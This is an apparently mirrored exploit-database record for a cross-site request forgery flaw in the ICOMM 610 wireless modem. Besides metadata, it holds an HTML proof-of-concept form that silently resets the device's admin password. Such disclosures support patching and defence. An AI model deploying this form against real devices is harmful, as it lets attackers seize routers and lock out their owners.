ID

VAR-E-201404-0067


EDB ID

39138


TITLE

ICOMM 610 Wireless Modem - Cross-Site Request Forgery - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 39138

DESCRIPTION

ICOMM 610 Wireless Modem - Cross-Site Request Forgery. CVE-105363 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 39138

AFFECTED PRODUCTS

vendor:icommmodel:wireless modemscope:eqversion:610

Trust: 1.0

sources: EXPLOIT-DB: 39138

EXPLOIT

source: https://www.securityfocus.com/bid/66593/info

ICOMM 610 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

ICOMM 610 01.01.08.991 and prior are vulnerable.

<html>
<!-- CSRF PoC --->
<body>
<form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 39138

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 39138

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 39138

TYPE

Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 39138

CREDITS

Blessen Thomas

Trust: 0.6

sources: EXPLOIT-DB: 39138

EXTERNAL IDS

db:EXPLOIT-DBid:39138

Trust: 1.9

db:BIDid:66593

Trust: 1.9

db:EDBNETid:60132

Trust: 0.6

sources: BID: 66593 // EXPLOIT-DB: 39138 // EDBNET: 60132

REFERENCES

url:https://www.securityfocus.com/bid/66593/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/39138/

Trust: 0.6

url:https://www.exploit-db.com/exploits/39138

Trust: 0.3

sources: BID: 66593 // EXPLOIT-DB: 39138 // EDBNET: 60132

SOURCES

db:BIDid:66593
db:EXPLOIT-DBid:39138
db:EDBNETid:60132

LAST UPDATE DATE

2022-07-27T09:37:55.930000+00:00


SOURCES UPDATE DATE

db:BIDid:66593date:2014-04-02T00:00:00

SOURCES RELEASE DATE

db:BIDid:66593date:2014-04-02T00:00:00
db:EXPLOIT-DBid:39138date:2014-04-12T00:00:00
db:EDBNETid:60132date:2014-04-12T00:00:00